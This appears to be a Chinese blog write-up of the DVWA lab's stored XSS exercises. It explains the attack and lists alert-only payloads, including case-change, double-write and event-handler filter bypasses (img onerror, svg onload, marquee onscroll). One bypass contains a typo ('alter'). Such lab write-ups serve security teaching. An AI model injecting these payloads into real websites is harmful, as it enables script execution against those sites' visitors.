dvwa靶场xss储存型

xss储存型

xxs储存型

攻击者事先将恶意代码上传或储存到漏洞服务器中,只要受害者浏览包含此恶意代码的页面就会执行恶意代码。产生层面:后端漏洞特征:持久性的、前端执行、储存在后端数据库

存储型XSS数据交互过程:用户输入数据->后端执行php代码->存入数据库某张表->返回数据给php页面->回显前端

不需要访问指定链接,访问到存在恶意代码的网页会自动弹出

low

没有任何过滤

xss常用语句

cpp 复制代码
<script>alert(/xss/)</script>

message框插入恶意代码

上传后刷新页面就会自动弹出

name栏插入恶意代码

会发现无法对长度做了限制将maxlenth手动更改至能插入恶意代码的长度
相同插入上述代码进行刷新页面也可以

medium

本关对message参数进行了编码导致无法执行代码,还对name参数的

绕过方法

大小写绕过

cpp 复制代码
<script>alter(/xss/)</script>

双写绕过

cpp 复制代码
<sc<script>ript>alert(/xss/)</script>

插入方法和low等级,没什么区别

high

cpp 复制代码
<img src=1 onerror=alert(1)>
<iMg src=1 oNeRrOr=alert(1)>
<ImG src=1 OnErRoR=alert(1)>
<svg onload=alert(1)>
<sVg OnLoAd=alert(1)>
<SvG oNlOaD=alert(1)>
<svg/onload=alert(1)>
<sVg/OnLoAd=alert(1)>
<SvG/oNlOaD=alert(1)>
<marquee onscroll=alert(1)>
<mArQuEe OnScRoLl=alert(1)>
<MaRqUeE oNsCrOlL=alert(1)>

成了

相关推荐
奶黄小甜包2 小时前
C语言零基础第9讲:指针基础
c语言·笔记·学习
泽虞2 小时前
C语言深度语法掌握笔记:语法陷阱、内存管理、指针系统
c语言·笔记·面试
yanxing.D4 小时前
考研408_数据结构笔记(第四章 串)
数据结构·笔记·考研·算法
Fuliy965 小时前
【数字图像处理系列笔记】Ch04:灰度变换与空间域图像增强(2)
图像处理·人工智能·笔记·计算机视觉·数字图像处理
再看扣你眼5 小时前
部署 Zabbix 企业级分布式监控笔记
笔记·分布式·zabbix
2301_801673015 小时前
8.6笔记
笔记
智者知已应修善业5 小时前
【51单片机6位数码管密码锁】2022-10-15
c语言·经验分享·笔记·单片机·嵌入式硬件·51单片机
AI必将改变世界6 小时前
【软考系统架构设计师备考笔记5】 - 专业英语
java·开发语言·人工智能·笔记·系统架构·英语
骑驴看星星a6 小时前
层次分析法代码笔记
开发语言·笔记·python·numpy